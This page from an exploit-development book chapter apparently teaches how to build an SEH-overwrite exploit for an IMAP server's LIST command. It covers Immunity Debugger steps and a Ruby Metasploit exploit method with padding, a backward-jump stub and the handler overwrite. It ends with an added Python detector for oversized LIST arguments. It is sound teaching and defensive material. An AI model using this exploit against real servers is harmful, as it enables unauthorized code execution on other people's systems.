208
Chapter 14
The payload that we use here, generic/debug_trap, won't actually send a payload. Instead, it sends multiple \xCCs, or breakpoints, to debug the execution flow of the exploit. This is useful for confirming that your shellcode is inserted at the right places in your exploit.
After running the exploit, open the Immunity Debugger, as shown in Figure 14-5, and at the crash select View > SEH chain. Set a breakpoint by pressing F2, and then press SHIFT-F9 to pass the exception to the application and step into the POP-POP-RETN sequence of instructions. Now, still in the debugger, press F7 to single-step through the instructions until you land in the 41414141 contained in NSEH.
Figure 14-5: Landing in the POP-POP-RETN instructions
Next, edit the exploit to include the instructions for the short jump backward, as shown here:

  def exploit
    connected = connect_login
    lead = "\x41" * 10356                        # padding up to the SEH record
    nseh = "\xeb\xf9\x90\x90"                    # jmp short -7 (backward), then two NOPs
    evil = lead + nseh + [target.ret].pack("A3") # handler address from the target definition
    print_status("Sending payload")
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
    sock.put(sploit)
    handler
    disconnect
  end
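From the defensive side, the LIST command built above is easy to pick out of IMAP traffic: the mailbox argument is far longer than any real mailbox name and carries raw non-printable bytes. The following inspector is an added example, not code from the book or from the Metasploit module; the sample commands are constructed here, and the 1024-byte limit is an assumed sane upper bound for a mailbox name.

```python
# Constructed sample IMAP LIST commands (not captured traffic). The first
# two are ordinary client requests; the third mirrors the layout used in
# the exploit above: a quoted mailbox argument padded with 0x41 bytes and
# a 4-byte instruction stub where the NSEH record would be.
SAMPLE_COMMANDS = [
    b'0001 LIST "" "*"\r\n',
    b'0002 LIST "INBOX" "%"\r\n',
    b'0002 LIST () "/' + b"\x41" * 10356 + b"\xeb\xf9\x90\x90"
    + b'AAA" "PWNED"\r\n',
]

PRINTABLE = set(range(0x20, 0x7F))  # printable ASCII per RFC 3501 atoms/strings
MAX_ARG_LEN = 1024                  # assumed upper bound for a mailbox argument


def inspect_list_command(line: bytes, max_len: int = MAX_ARG_LEN) -> dict:
    """Examine one IMAP command line and report whether it is a LIST
    whose argument string is oversized or contains non-printable bytes."""
    parts = line.rstrip(b"\r\n").split(b" ", 3)
    if len(parts) < 4 or parts[1].upper() != b"LIST":
        return {"is_list": False, "suspicious": False}

    # Everything after "tag LIST reference " is treated as the argument
    # string, so a trailing extra argument (as in the sample) is included.
    args = parts[3]
    bad_positions = [i for i, b in enumerate(args) if b not in PRINTABLE]
    return {
        "is_list": True,
        "tag": parts[0].decode("ascii", "replace"),
        "arg_len": len(args),
        "nonprintable": len(bad_positions),
        # Offset of the first raw byte inside the argument, useful when
        # reconstructing where an injected stub sat in the buffer.
        "first_nonprintable_at": bad_positions[0] if bad_positions else None,
        "suspicious": len(args) > max_len or bool(bad_positions),
    }


def scan(lines):
    """Run the inspector over a sequence of command lines."""
    return [inspect_list_command(line) for line in lines]


if __name__ == "__main__":
    for result in scan(SAMPLE_COMMANDS):
        print(result)
```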